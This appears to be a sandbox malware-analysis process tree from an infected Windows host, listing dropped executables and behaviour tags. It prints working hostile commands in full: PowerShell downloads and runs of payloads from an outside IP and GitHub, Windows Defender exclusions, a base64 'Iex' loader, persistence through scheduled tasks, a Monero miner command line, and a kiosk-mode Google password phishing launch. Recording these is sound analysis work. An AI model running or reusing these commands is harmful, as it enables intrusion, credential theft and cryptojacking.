                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3492,i,16918982237869938154,5001213302799639046,262144 --variations-seed-version --mojo-platform-channel-handle=3536 /prefetch:1
                                                  7⤵
                                                  • Uses browser remote debugging
                                                  PID:10656
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\9zcba" & exit
                                                6⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:10440
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 11
                                                  7⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Delays execution with timeout.exe
                                                  PID:10728
                                          • C:\Users\Admin\AppData\Local\Temp\10063820101\BrokPyR.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10063820101\BrokPyR.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            PID:1752
                                            • C:\Users\Admin\AppData\Local\Temp\10063820101\BrokPyR.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10063820101\BrokPyR.exe"
                                              5⤵
                                              • Drops startup file
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • System Location Discovery: System Language Discovery
                                              PID:12768
                                              • C:\Users\Admin\AppData\Local\Temp\tmpir8pchlk.exe
                                                C:\Users\Admin\AppData\Local\Temp\tmpir8pchlk.exe
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:8272
                                                • C:\Windows\system32\notepad.exe
                                                  "C:\Windows\system32\notepad.exe" --donate-level 2 -o pool.supportxmr.com:3333 -u 43cpZ7ZhuutZwtdk81zbnSK9MaarnTsUy3bh3T9HgSdC8uKgRwWxPCG6M3eBWJiunr76d6UUKL3JgdaTSCTrNQLW1XeNfDT -k -p Admin --cpu-max-threads-hint=70
                                                  7⤵
                                                    PID:8868
                                            • C:\Users\Admin\AppData\Local\Temp\10064520101\lBiQciH.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10064520101\lBiQciH.exe"
                                              4⤵
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              PID:7560
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\uqthrtzoqetw', 'C:\Users', 'C:\ProgramData'"
                                                5⤵
                                                  PID:9544
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\uqthrtzoqetw', 'C:\Users', 'C:\ProgramData'"
                                                    6⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    PID:13064
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/mineratowerst.exe' -OutFile 'C:\Users\Admin\AppData\Local\uqthrtzoqetw\ynjrybyoa.exe'"
                                                  5⤵
                                                    PID:11292
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/mineratowerst.exe' -OutFile 'C:\Users\Admin\AppData\Local\uqthrtzoqetw\ynjrybyoa.exe'"
                                                      6⤵
                                                      • Blocklisted process makes network request
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Downloads MZ/PE file
                                                      PID:11748
                                                  • C:\Users\Admin\AppData\Local\uqthrtzoqetw\ynjrybyoa.exe
                                                    "C:\Users\Admin\AppData\Local\uqthrtzoqetw\ynjrybyoa.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:12128
                                                • C:\Users\Admin\AppData\Local\Temp\10064720101\525ffce19b.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10064720101\525ffce19b.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  PID:10020
                                                  • C:\Users\Admin\AppData\Local\Temp\is-5E4MS.tmp\525ffce19b.tmp
                                                    "C:\Users\Admin\AppData\Local\Temp\is-5E4MS.tmp\525ffce19b.tmp" /SL5="$403DC,20459747,844800,C:\Users\Admin\AppData\Local\Temp\10064720101\525ffce19b.exe"
                                                    5⤵
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:10264
                                                    • C:\Users\Admin\AppData\Roaming\MyApp\data\KMSpico.exe
                                                      "C:\Users\Admin\AppData\Roaming\MyApp\data\KMSpico.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:10584
                                                      • C:\Users\Admin\AppData\Local\Temp\is-UIMRN.tmp\KMSpico.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-UIMRN.tmp\KMSpico.tmp" /SL5="$1042C,2952592,69120,C:\Users\Admin\AppData\Roaming\MyApp\data\KMSpico.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Drops file in System32 directory
                                                        • Drops file in Program Files directory
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies Internet Explorer Phishing Filter
                                                        PID:10676
                                                        • C:\Windows\system32\cmd.exe
                                                          "C:\Windows\system32\cmd.exe" /C ""C:\Program Files\KMSpico\scripts\Install_Service.cmd""
                                                          8⤵
                                                            PID:2008
                                                            • C:\Windows\system32\sc.exe
                                                              sc create "Service KMSELDI" binPath= "C:\Program Files\KMSpico\Service_KMS.exe" type= own error= normal start= auto DisplayName= "Service KMSELDI"
                                                              9⤵
                                                              • Launches sc.exe
                                                              PID:9784
                                                          • C:\Windows\system32\cmd.exe
                                                            "C:\Windows\system32\cmd.exe" /C ""C:\Program Files\KMSpico\scripts\Install_Task.cmd""
                                                            8⤵
                                                              PID:13064
                                                              • C:\Windows\system32\schtasks.exe
                                                                SCHTASKS /Create /TN "AutoPico Daily Restart" /TR "'C:\Program Files\KMSpico\AutoPico.exe' /silent" /SC DAILY /ST 23:59:59 /RU "NT AUTHORITY\SYSTEM" /RL Highest /F
                                                                9⤵
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:5440
                                                            • C:\Program Files\KMSpico\UninsHs.exe
                                                              "C:\Program Files\KMSpico\UninsHs.exe" /r0=KMSpico,default,C:\Users\Admin\AppData\Roaming\MyApp\data\KMSpico.exe
                                                              8⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:9424
                                                            • C:\Program Files\KMSpico\KMSELDI.exe
                                                              "C:\Program Files\KMSpico\KMSELDI.exe" /silent /backup
                                                              8⤵
                                                              • Event Triggered Execution: Image File Execution Options Injection
                                                              • Executes dropped EXE
                                                              • Indicator Removal: Clear Persistence
                                                              • Drops file in Program Files directory
                                                              • Drops file in Windows directory
                                                              • Modifies Control Panel
                                                              • Modifies data under HKEY_USERS
                                                              PID:9068
                                                            • C:\Program Files\KMSpico\AutoPico.exe
                                                              "C:\Program Files\KMSpico\AutoPico.exe" /silent
                                                              8⤵
                                                              • Event Triggered Execution: Image File Execution Options Injection
                                                              • Executes dropped EXE
                                                              • Indicator Removal: Clear Persistence
                                                              • Modifies Control Panel
                                                              • Modifies data under HKEY_USERS
                                                              PID:5828
                                                        • C:\Users\Admin\AppData\Roaming\MyApp\core.exe
                                                          "C:\Users\Admin\AppData\Roaming\MyApp\core.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          PID:10592
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -exec bypass <!DOCTYPE html> <html lang="en"> <head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.com - Not Found (#404)</title> </head> <body> <h1>Not Found (#404)</h1> <p>This page is no longer available. It has either expired, been removed by its creator, or removed by one of the Pastebin staff.</p> </body> </html>
                                                            7⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • System Location Discovery: System Language Discovery
                                                            PID:10276
                                                        • C:\Users\Admin\AppData\Roaming\MyApp\info.exe
                                                          "C:\Users\Admin\AppData\Roaming\MyApp\info.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          PID:10756
                                                    • C:\Users\Admin\AppData\Local\Temp\10064730101\518661c5fc.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10064730101\518661c5fc.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:2312
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                        5⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:7152
                                                    • C:\Users\Admin\AppData\Local\Temp\10064740101\6a172933cd.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10064740101\6a172933cd.exe"
                                                      4⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Downloads MZ/PE file
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:6216
                                                      • C:\Users\Admin\AppData\Local\Temp\ZH66FT2SF3KZS55G4K6E7.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\ZH66FT2SF3KZS55G4K6E7.exe"
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        PID:9196
                                                    • C:\Users\Admin\AppData\Local\Temp\10064750101\419748d64b.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10064750101\419748d64b.exe"
                                                      4⤵
                                                      • Modifies Windows Defender DisableAntiSpyware settings
                                                      • Modifies Windows Defender Real-time Protection settings
                                                      • Modifies Windows Defender TamperProtection settings
                                                      • Modifies Windows Defender notification settings
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Windows security modification
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2104
                                                    • C:\Users\Admin\AppData\Local\Temp\10064760101\b9c645bc7c.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10064760101\b9c645bc7c.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:3548
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /F /IM firefox.exe /T
                                                        5⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Kills process with taskkill
                                                        PID:12084
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /F /IM chrome.exe /T
                                                        5⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Kills process with taskkill
                                                        PID:7548
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /F /IM msedge.exe /T
                                                        5⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Kills process with taskkill
                                                        PID:7640
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /F /IM opera.exe /T
                                                        5⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Kills process with taskkill
                                                        PID:7836
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /F /IM brave.exe /T
                                                        5⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Kills process with taskkill
                                                        PID:7908
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                        5⤵
                                                          PID:8000
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                            6⤵
                                                            • Drops desktop.ini file(s)
                                                            • Checks processor information in registry
                                                            • Modifies registry class
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:8024
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1956 -prefsLen 27100 -prefMapHandle 1960 -prefMapSize 270279 -ipcHandle 2056 -initialChannelId {411420b8-061e-40b2-8ca9-5df6a3b166da} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                              7⤵
                                                                PID:8316
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2500 -prefsLen 27136 -prefMapHandle 2504 -prefMapSize 270279 -ipcHandle 2512 -initialChannelId {1cf3bb7f-3af9-4801-9f9a-5eb70578cd45} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                7⤵
                                                                  PID:2208
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3808 -prefsLen 25164 -prefMapHandle 3812 -prefMapSize 270279 -jsInitHandle 3816 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3840 -initialChannelId {30a8fcd8-c6b1-4f95-b090-92062cbe5bd5} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                  7⤵
                                                                  • Checks processor information in registry
                                                                  PID:9512
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4040 -prefsLen 27277 -prefMapHandle 4044 -prefMapSize 270279 -ipcHandle 4132 -initialChannelId {e78a1422-f2e6-40b1-a4d8-c48b9f2ecfbb} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                  7⤵
                                                                    PID:12740
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4564 -prefsLen 34776 -prefMapHandle 4568 -prefMapSize 270279 -jsInitHandle 4572 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4580 -initialChannelId {a6b768b0-5991-4649-b071-f13ea8ccffe5} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                    7⤵
                                                                    • Checks processor information in registry
                                                                    PID:1260
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4912 -prefsLen 35013 -prefMapHandle 5228 -prefMapSize 270279 -ipcHandle 5232 -initialChannelId {5157e63c-1031-4e55-abd5-ab6a01a74e12} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                    7⤵
                                                                    • Checks processor information in registry
                                                                    PID:6424
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5380 -prefsLen 32952 -prefMapHandle 5384 -prefMapSize 270279 -jsInitHandle 5388 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 1476 -initialChannelId {a648f0db-9fd3-4270-a2e4-3afe7421d14f} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                    7⤵
                                                                    • Checks processor information in registry
                                                                    PID:11816
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5412 -prefsLen 32952 -prefMapHandle 5416 -prefMapSize 270279 -jsInitHandle 5420 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5432 -initialChannelId {385986f8-2dc5-48b0-a4ae-810651bd1d6b} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                    7⤵
                                                                    • Checks processor information in registry
                                                                    PID:8664
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5788 -prefsLen 32952 -prefMapHandle 5792 -prefMapSize 270279 -jsInitHandle 5796 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2952 -initialChannelId {1c705ffa-582c-453a-a9ad-37c86cc700a1} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                    7⤵
                                                                    • Checks processor information in registry
                                                                    PID:11960
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4920 -prefsLen 33002 -prefMapHandle 4856 -prefMapSize 270279 -jsInitHandle 1760 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4872 -initialChannelId {ce1320c4-3fd7-401e-8277-063b8c48d12b} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab
                                                                    7⤵
                                                                    • Checks processor information in registry
                                                                    PID:10184
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4328 -prefsLen 33002 -prefMapHandle 6312 -prefMapSize 270279 -jsInitHandle 6308 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6320 -initialChannelId {a14becd1-6cba-471f-870d-fe51942b1269} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 11 tab
                                                                    7⤵
                                                                    • Checks processor information in registry
                                                                    PID:1704
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 1 -prefsHandle 5000 -prefsLen 36739 -prefMapHandle 5032 -prefMapSize 270279 -ipcHandle 3268 -initialChannelId {626329a6-3b3e-4bf8-ab37-8c7797f0bf7d} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 12 utility
                                                                    7⤵
                                                                    • Checks processor information in registry
                                                                    PID:12660
                                                            • C:\Users\Admin\AppData\Local\Temp\10064770101\ccabf7b229.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10064770101\ccabf7b229.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              PID:9320
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c schtasks /create /tn xUPO2mav1ad /tr "mshta C:\Users\Admin\AppData\Local\Temp\3y6HYecPv.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                5⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:10204
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /create /tn xUPO2mav1ad /tr "mshta C:\Users\Admin\AppData\Local\Temp\3y6HYecPv.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                  6⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:5624
                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                mshta C:\Users\Admin\AppData\Local\Temp\3y6HYecPv.hta
                                                                5⤵
                                                                • Checks computer location settings
                                                                • System Location Discovery: System Language Discovery
                                                                PID:11052
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'Q4EE54ZEZ66SPLEOVOFXJNLLB2RT5GEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.39.17.162/testmine/random.exe',$d);Start-Process $d;
                                                                  6⤵
                                                                  • Blocklisted process makes network request
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3664
                                                            • C:\Users\Admin\AppData\Local\Temp\10064780101\6ad67669e5.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10064780101\6ad67669e5.exe"
                                                              4⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • Suspicious use of SetThreadContext
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1884
                                                              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10064780101\6ad67669e5.exe"
                                                                5⤵
                                                                • Downloads MZ/PE file
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:11532
                                                            • C:\Users\Admin\AppData\Local\Temp\10064790101\BrokPyR.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10064790101\BrokPyR.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:9836
                                                              • C:\Users\Admin\AppData\Local\Temp\10064790101\BrokPyR.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10064790101\BrokPyR.exe"
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • System Location Discovery: System Language Discovery
                                                                PID:13028
                                                                • C:\Users\Admin\AppData\Local\Temp\tmpd8i_9vv4.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\tmpd8i_9vv4.exe
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:12792
                                                                  • C:\Windows\system32\notepad.exe
                                                                    "C:\Windows\system32\notepad.exe" --donate-level 2 -o pool.supportxmr.com:3333 -u 43cpZ7ZhuutZwtdk81zbnSK9MaarnTsUy3bh3T9HgSdC8uKgRwWxPCG6M3eBWJiunr76d6UUKL3JgdaTSCTrNQLW1XeNfDT -k -p Admin --cpu-max-threads-hint=70
                                                                    7⤵
                                                                      PID:5460
                                                              • C:\Users\Admin\AppData\Local\Temp\10064800101\i5Kz53x.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10064800101\i5Kz53x.exe"
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:5536
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                  5⤵
                                                                  • Downloads MZ/PE file
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:7960
                                                              • C:\Users\Admin\AppData\Local\Temp\10064810101\23f282f58a.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10064810101\23f282f58a.exe"
                                                                4⤵
                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                • Checks BIOS information in registry
                                                                • Executes dropped EXE
                                                                • Identifies Wine through registry keys
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                • System Location Discovery: System Language Discovery
                                                                PID:8060
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 8060 -s 756
                                                                  5⤵
                                                                  • Program crash
                                                                  PID:8872
                                                              • C:\Users\Admin\AppData\Local\Temp\10064820101\GitcS6s.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10064820101\GitcS6s.exe"
                                                                4⤵
                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                • Checks BIOS information in registry
                                                                • Executes dropped EXE
                                                                • Identifies Wine through registry keys
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                • System Location Discovery: System Language Discovery
                                                                PID:10352
                                                              • C:\Users\Admin\AppData\Local\Temp\10064830101\Hmcm0Oj.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10064830101\Hmcm0Oj.exe"
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:10292
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10064841121\690BRuM.cmd"
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:1140
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  Cmd.ExE /c StARt /mIn PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\Admin\AppData\Local\Temp\10064841121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"
                                                                  5⤵
                                                                    PID:4064
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\Admin\AppData\Local\Temp\10064841121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"
                                                                      6⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Drops startup file
                                                                      PID:10024
                                                                      • C:\Users\Admin\AppData\Local\ZskZOgxSzfJebDEwQ.exe
                                                                        "C:\Users\Admin\AppData\Local\ZskZOgxSzfJebDEwQ.exe" C:\Users\Admin\AppData\Local\JYhVoaFaykTob.au3
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        PID:6584
                                                                • C:\Users\Admin\AppData\Local\Temp\10064850101\zBbvtJ0.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10064850101\zBbvtJ0.exe"
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:12792
                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                    5⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:7532
                                                                • C:\Users\Admin\AppData\Local\Temp\10064860101\7IPCJFu.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10064860101\7IPCJFu.exe"
                                                                  4⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Executes dropped EXE
                                                                  • Identifies Wine through registry keys
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1372
                                                                • C:\Users\Admin\AppData\Local\Temp\10064870101\235T1TS.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10064870101\235T1TS.exe"
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:12808
                                                                • C:\Users\Admin\AppData\Local\Temp\10064880101\LAc2heq.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10064880101\LAc2heq.exe"
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:8436
                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                    5⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:12440
                                                                • C:\Users\Admin\AppData\Local\Temp\10064890101\xztOH3r.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10064890101\xztOH3r.exe"
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:11832
                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                    5⤵
                                                                      PID:1056
